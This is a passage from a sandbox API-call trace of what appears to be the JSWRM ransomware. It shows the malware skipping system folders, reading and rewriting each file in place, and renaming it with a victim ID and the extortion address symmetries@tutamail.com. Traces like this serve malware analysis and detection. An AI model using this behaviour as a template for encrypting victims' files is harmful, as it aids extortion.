(lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0060.296] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0060.296] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0060.296] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0060.296] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0060.296] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0060.296] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0060.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0060.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0060.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0060.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0060.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0060.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0060.296] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0060.296] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2=".") returned 1 [0060.296] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="..") returned 1 [0060.296] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="...") returned 1 [0060.296] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="windows") returned -1 [0060.297] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="recovery") returned -1 [0060.297] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="perflogs") returned -1 [0060.297] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="documents and settings") returned 1 [0060.297] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="$RECYCLE.BIN") returned 1 [0060.297] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="system volume information") returned -1 [0060.297] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="msocache") returned 1 [0060.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Parameterinfo.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0060.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Parameterinfo.xml", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Parameterinfo.xml", lpUsedDefaultChar=0x0) returned 17 [0060.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Parameterinfo.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0060.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Parameterinfo.xml", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Parameterinfo.xml", lpUsedDefaultChar=0x0) returned 17 [0060.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0060.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0060.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0060.297] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.298] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=201796) returned 1 [0060.298] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0060.298] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x27100, lpOverlapped=0x0) returned 1 [0060.311] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.311] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x27100, lpOverlapped=0x0) returned 1 [0060.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.311] CloseHandle (hObject=0x3d4) returned 1 [0060.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0060.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0060.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0060.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0060.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216d80 [0060.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0060.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0060.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216d80 | out: hHeap=0x1e0000) returned 1 [0060.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.316] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), lpNewFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0060.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0060.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0060.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0060.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0060.317] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0060.317] lstrcmpiW (lpString1="UiInfo.xml", lpString2=".") returned 1 [0060.317] lstrcmpiW (lpString1="UiInfo.xml", lpString2="..") returned 1 [0060.317] lstrcmpiW (lpString1="UiInfo.xml", lpString2="...") returned 1 [0060.317] lstrcmpiW (lpString1="UiInfo.xml", lpString2="windows") returned -1 [0060.317] lstrcmpiW (lpString1="UiInfo.xml", lpString2="recovery") returned 1 [0060.317] lstrcmpiW (lpString1="UiInfo.xml", lpString2="perflogs") returned 1 [0060.317] lstrcmpiW (lpString1="UiInfo.xml", lpString2="documents and settings") returned 1 [0060.317] lstrcmpiW (lpString1="UiInfo.xml", lpString2="$RECYCLE.BIN") returned 1 [0060.317] lstrcmpiW (lpString1="UiInfo.xml", lpString2="system volume information") returned 1 [0060.317] lstrcmpiW (lpString1="UiInfo.xml", lpString2="msocache") returned 1 [0060.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0060.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UiInfo.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0060.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UiInfo.xml", cchWideChar=10, lpMultiByteStr=0x345f610, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UiInfo.xml", lpUsedDefaultChar=0x0) returned 10 [0060.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0060.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0060.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UiInfo.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0060.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UiInfo.xml", cchWideChar=10, lpMultiByteStr=0x345f5e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UiInfo.xml", lpUsedDefaultChar=0x0) returned 10 [0060.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0060.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0060.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0060.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0060.317] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.318] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=39042) returned 1 [0060.318] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9880) returned 0x2471a8 [0060.318] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x9880, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x9880, lpOverlapped=0x0) returned 1 [0060.323] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.323] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x9880, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x9880, lpOverlapped=0x0) returned 1 [0060.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.325] CloseHandle (hObject=0x3d4) returned 1 [0060.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0060.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0060.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0060.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0060.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0060.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.326] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), lpNewFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0060.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0060.328] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0060.328] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0060.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0060.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0060.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0060.329] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="DHtmlHeader.html", cAlternateFileName="DHTMLH~1.HTM")) returned 1 [0060.329] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2=".") returned 1 [0060.329] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="..") returned 1 [0060.329] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="...") returned 1 [0060.329] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="windows") returned -1 [0060.329] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="recovery") returned -1 [0060.329] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="perflogs") returned -1 [0060.329] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="documents and settings") returned -1 [0060.329] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="$RECYCLE.BIN") returned 1 [0060.329] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="system volume information") returned -1 [0060.329] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="msocache") returned -1 [0060.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DHtmlHeader.html", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0060.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0060.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DHtmlHeader.html", cchWideChar=16, lpMultiByteStr=0x2412e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DHtmlHeader.html", lpUsedDefaultChar=0x0) returned 16 [0060.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DHtmlHeader.html", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0060.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0060.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DHtmlHeader.html", cchWideChar=16, lpMultiByteStr=0x241218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DHtmlHeader.html", lpUsedDefaultChar=0x0) returned 16 [0060.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0060.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0060.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0060.329] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0060.330] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=16118) returned 1 [0060.330] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3ef0) returned 0x2471a8 [0060.330] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x3ef0, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x3ef0, lpOverlapped=0x0) returned 1 [0060.342] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.342] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x3ef0, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x3ef0, lpOverlapped=0x0) returned 1 [0060.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.342] CloseHandle (hObject=0x450) returned 1 [0060.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 